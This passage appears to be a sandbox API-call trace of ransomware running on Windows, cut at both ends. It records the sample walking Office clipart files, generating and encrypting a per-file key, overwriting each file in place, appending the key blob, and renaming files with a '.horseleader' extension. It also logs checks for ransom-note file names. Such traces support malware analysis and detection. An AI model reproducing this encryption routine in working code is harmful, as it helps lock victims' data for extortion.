StrStrW (lpFirst="DD01178_.WMF", lpSrch=".txt") returned 0x0 [0254.504] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3796) returned 1 [0254.504] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0254.512] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff12c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.512] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xed4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0254.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.513] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.513] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.513] CloseHandle (hObject=0x158) returned 1 [0254.513] GetProcessHeap () returned 0x780000 [0254.513] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.513] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.horseleader") returned 79 [0254.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.horseleader")) returned 1 [0254.515] GetProcessHeap () returned 0x780000 [0254.515] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.515] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01179_.WMF", cAlternateFileName="")) returned 1 [0254.515] lstrcmpiW (lpString1="DD01179_.WMF", lpString2="Windows") returned -1 [0254.515] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0254.515] StrStrIW (lpFirst="DD01179_.WMF", lpSrch=".horseleader") returned 0x0 [0254.515] lstrcmpW (lpString1="DD01179_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.515] lstrcmpW (lpString1="DD01179_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.515] lstrlenW (lpString=".testttjffg") returned 11 [0254.515] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.515] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.515] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 67 [0254.516] StrStrW (lpFirst="DD01179_.WMF", lpSrch=".txt") returned 0x0 [0254.516] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2024) returned 1 [0254.516] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e8, lpOverlapped=0x0) returned 1 [0254.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff818, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e8, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e8, lpOverlapped=0x0) returned 1 [0254.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.521] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.521] CloseHandle (hObject=0x158) returned 1 [0254.521] GetProcessHeap () returned 0x780000 [0254.521] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.521] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.horseleader") returned 79 [0254.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.horseleader")) returned 1 [0254.523] GetProcessHeap () returned 0x780000 [0254.523] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.523] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x824, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01180_.WMF", cAlternateFileName="")) returned 1 [0254.523] lstrcmpiW (lpString1="DD01180_.WMF", lpString2="Windows") returned -1 [0254.523] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0254.523] StrStrIW (lpFirst="DD01180_.WMF", lpSrch=".horseleader") returned 0x0 [0254.523] lstrcmpW (lpString1="DD01180_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.523] lstrcmpW (lpString1="DD01180_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.523] lstrlenW (lpString=".testttjffg") returned 11 [0254.523] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.523] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.523] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 67 [0254.524] StrStrW (lpFirst="DD01180_.WMF", lpSrch=".txt") returned 0x0 [0254.524] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2084) returned 1 [0254.524] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x824, lpOverlapped=0x0) returned 1 [0254.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.527] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x824, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x824, lpOverlapped=0x0) returned 1 [0254.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.528] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.528] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.528] CloseHandle (hObject=0x158) returned 1 [0254.528] GetProcessHeap () returned 0x780000 [0254.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.528] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.horseleader") returned 79 [0254.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\dd01180_.wmf.horseleader")) returned 1 [0254.530] GetProcessHeap () returned 0x780000 [0254.530] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.530] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5a8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01181_.WMF", cAlternateFileName="")) returned 1 [0254.530] lstrcmpiW (lpString1="DD01181_.WMF", lpString2="Windows") returned -1 [0254.530] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0254.530] StrStrIW (lpFirst="DD01181_.WMF", lpSrch=".horseleader") returned 0x0 [0254.530] lstrcmpW (lpString1="DD01181_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.530] lstrcmpW (lpString1="DD01181_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.530] lstrlenW (lpString=".testttjffg") returned 11 [0254.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.535] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 67 [0254.535] StrStrW (lpFirst="DD01181_.WMF", lpSrch=".txt") returned 0x0 [0254.535] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1448) returned 1 [0254.535] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5a8, lpOverlapped=0x0) returned 1 [0254.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.537] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5a8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5a8, lpOverlapped=0x0) returned 1 [0254.537] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.537] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.538] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.538] CloseHandle (hObject=0x158) returned 1 [0254.538] GetProcessHeap () returned 0x780000 [0254.538] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.538] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.horseleader") returned 79 [0254.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01181_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01181_.wmf.horseleader")) returned 1 [0254.539] GetProcessHeap () returned 0x780000 [0254.539] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.539] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01182_.WMF", cAlternateFileName="")) returned 1 [0254.539] lstrcmpiW (lpString1="DD01182_.WMF", lpString2="Windows") returned -1 [0254.539] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0254.539] StrStrIW (lpFirst="DD01182_.WMF", lpSrch=".horseleader") returned 0x0 [0254.539] lstrcmpW (lpString1="DD01182_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.539] lstrcmpW (lpString1="DD01182_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.539] lstrlenW (lpString=".testttjffg") returned 11 [0254.540] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.540] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.540] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.540] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 67 [0254.542] StrStrW (lpFirst="DD01182_.WMF", lpSrch=".txt") returned 0x0 [0254.542] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2996) returned 1 [0254.542] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbb4, lpOverlapped=0x0) returned 1 [0254.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff44c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.579] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbb4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbb4, lpOverlapped=0x0) returned 1 [0254.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.579] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.580] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.580] CloseHandle (hObject=0x158) returned 1 [0254.580] GetProcessHeap () returned 0x780000 [0254.580] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.580] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.horseleader") returned 79 [0254.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01182_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01182_.wmf.horseleader")) returned 1 [0254.581] GetProcessHeap () returned 0x780000 [0254.581] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.581] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01183_.WMF", cAlternateFileName="")) returned 1 [0254.582] lstrcmpiW (lpString1="DD01183_.WMF", lpString2="Windows") returned -1 [0254.582] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0254.582] StrStrIW (lpFirst="DD01183_.WMF", lpSrch=".horseleader") returned 0x0 
[0254.582] lstrcmpW (lpString1="DD01183_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.582] lstrcmpW (lpString1="DD01183_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.582] lstrlenW (lpString=".testttjffg") returned 11 [0254.582] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.582] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.582] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.583] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 67 [0254.583] StrStrW (lpFirst="DD01183_.WMF", lpSrch=".txt") returned 0x0 [0254.583] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2296) returned 1 [0254.583] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8f8, lpOverlapped=0x0) returned 1 [0254.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8f8, lpOverlapped=0x0) returned 1 
[0254.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.595] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.595] CloseHandle (hObject=0x158) returned 1 [0254.596] GetProcessHeap () returned 0x780000 [0254.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.596] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.horseleader") returned 79 [0254.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.horseleader")) returned 1 [0254.597] GetProcessHeap () returned 0x780000 [0254.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.597] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9936cb00, 